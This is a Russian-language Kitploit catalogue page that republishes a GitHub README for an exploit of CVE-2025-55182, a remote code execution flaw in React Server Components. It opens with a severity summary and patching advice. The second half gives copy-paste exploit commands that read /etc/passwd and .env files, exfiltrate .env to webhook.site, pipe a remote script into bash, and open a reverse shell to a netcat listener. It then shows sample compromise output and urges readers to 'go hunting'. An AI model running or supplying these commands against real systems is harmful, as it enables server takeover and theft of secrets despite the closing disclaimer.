Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-55182 — CVE-2025-55182 | Kitploit
Инструменты/GitHubGitHub/shen771/blackash-cve-2025-55182
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного Доступа
GitHubshen771/blackash-cve-2025-55182
3039 месяцев назадЕщё не проверено

Blackash-CVE-2025-55182

CVE-2025-55182

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2025-55182 — Критическая уязвимость React Server

6930a0395ea4b5bfdd70430a_CVE-2025-55182

🧠 Что это такое

  • ⚛️ Критическая уязвимость безопасности в React Server Components (RSC)
  • 🧨 Вызвана небезопасной десериализацией
  • 🌐 Эксплуатируется через сетевые запросы
  • 🔓 Аутентификация не требуется
  • ☠️ Может привести к удаленному выполнению кода (RCE)

✅ Это означает, что злоумышленники потенциально могут выполнить произвольный серверный код с помощью одного единственного сформированного запроса.


📊 Серьёзность

  • 🔴 CVSS Score: 10.0 (Critical)
  • 🏴‍☠️ Сложность атаки: Низкая
  • 🔑 Необходимые привилегии: Нет
  • 👤 Взаимодействие с пользователем: Нет
  • 💥 Воздействие: Полная компрометация системы

📦 Затронутые технологии

⚠️ Системы, использующие React Server Components, включая:

  • ✅ Пакеты React server DOM

  • ✅ Фреймворки, включающие RSC, такие как:

Скачать инструмент
Next.js (App Router + RSC)
  • Плагины Vite RSC
  • Инструменты Parcel RSC
  • Redwood, Waku и др.
  • ❌ Не затронуты:

    • Чисто клиентские React-приложения
    • Приложения, которые НЕ используют Server Components

    🔥 Почему это опасно

    • 🧑‍💻 Злоумышленники могут выполнять команды на вашем сервере
    • 🗃️ Потенциальная возможность украсть базы данных и секреты
    • 🦠 Может быть использовано для развертывания программ-вымогателей или бэкдоров
    • 🔄 Может позволить горизонтальное перемещение по инфраструктуре
    • 🚀 Эксплуатируется в масштабе

    🛠️ Что делать немедленно

    ✅ 1. Исправить и обновить

    • ⬆️ Обновить React до исправленных версий
    • ⬆️ Обновить Next.js или любой фреймворк на базе RSC

    ✅ 2. Аудит зависимостей

    • 🔍 Сканировать на транзитивные уязвимые пакеты

    • 🧾 Использовать:

      • npm audit
      • pnpm audit
      • yarn audit

    ✅ 3. Временная защита (не полное решение)

    • 🛡️ Правила WAF
    • 🔐 Фильтры проверки запросов
    • 🚫 Блокировка подозрительных полезных нагрузок

    ⚠️ Это только уменьшает риск — они НЕ заменяют исправления


    👥 Кого это должно касаться?

    • ✅ Full-stack разработчики, использующие Next.js App Router

    • ✅ DevOps-команды, размещающие React SSR-приложения

    • ✅ Инженеры по безопасности, мониторящие:

      • Веб-сервисы Node.js
      • Edge runtimes
      • Serverless SSR-приложения

    📌 Ключевой вывод

    🚨 Если ваше приложение использует React Server Components и не исправлено — оно потенциально полностью скомпрометировано прямо сейчас.


    🚨 Вот все быстрые однострочники, которые вам когда-либо понадобятся (копировать-вставить → мгновенный результат):

    CVE-2025-55182.py (базовое RCE)

    root@kitploit:~
    # Basic info
    ./CVE-2025-55182.py https://target.com "id"
    ./CVE-2025-55182.py https://target.com "whoami"
    ./CVE-2025-55182.py https://target.com "uname -a"
    
    # Read files
    ./CVE-2025-55182.py https://target.com "cat /etc/passwd"
    ./CVE-2025-55182.py https://target.com "cat /app/.env"
    
    # Exfiltrate
    ./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
    
    # Download & run (if wget/curl exists)
    ./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
    

    CVE-2025-55182-revshell.py (мгновенный реверс-шелл)

    root@kitploit:~
    # 1. Start listener (once)
    nc -lvnp 4444
    
    # 2. Fire → shell in <3 seconds
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    Это буквально всё.
    Два скрипта, эти 8 команд → полная компрометация любого неисправленного сайта на Next.js сегодня.
    Идите за баунти.

    Вот что именно вы увидите в реальном времени, когда эксплойт сработает (100% неисправленная цель, 3 декабря 2025):

    1. Когда вы запускаете обычный RCE-скрипт (CVE-2025-55182.py)
    Вы вводите:

    root@kitploit:~
    ./CVE-2025-55182.py https://target.com "whoami"
    

    Вы мгновенно видите на экране:

    root@kitploit:~
    [+] CVE-2025-55182 Exploit
    [+] Target  : https://target.com
    [+] Command : whoami
    [+] Sending payload ...
    [+] Payload delivered successfully!
    [+] HTTP 200 – Command should have executed on the server
    [+] Server response:
    node
    

    → Этот «node» (или то, что возвращает команда) — фактический вывод с сервера жертвы.
    Если вы запустите id, вы увидите полные строки uid/gid и т.д.

    2. Когда вы запускаете скрипт реверс-шелла (CVE-2025-55182-revshell.py)
    Вы вводите:

    root@kitploit:~
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    Вы мгновенно видите в терминале слушателя:

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
    whoami
    node
    pwd
    /app
    ls -la
    total 1234
    drwxr-xr-x 1 node node  4096 Dec  3 12:34 .
    drwxr-xr-x 1 root root  4096 Nov 30 10:11 ..
    -rw-r--r-- 1 node node   420 Dec  3 11:11 .env
    ...
    

    → Полная интерактивная TTY-оболочка от пользователя node (почти всегда пользователь веб-приложения). Сервер ваш.

    Это буквально всё.
    Если вы видите что-то из вышеперечисленного → эксплойт сработал на 100 %.
    Если вы получаете только HTTP 403/404 или ничего → уже исправлено или заблокировано WAF-ом.

    Идите на охоту.


    отказ от ответственности

    Данный PoC предназначен только для авторизованного тестирования безопасности и образовательных целей.
    Не запускайте его против любой системы, которой вы не владеете или на тестирование которой у вас нет явного письменного разрешения.
    Несанкционированное использование незаконно и может привести к уголовному преследованию.
    Используйте только в своей лаборатории, в программах bug-bounty с четкой областью действия или на целях, которые дали вам разрешение.

    Вы несете 100 % ответственности за свои действия.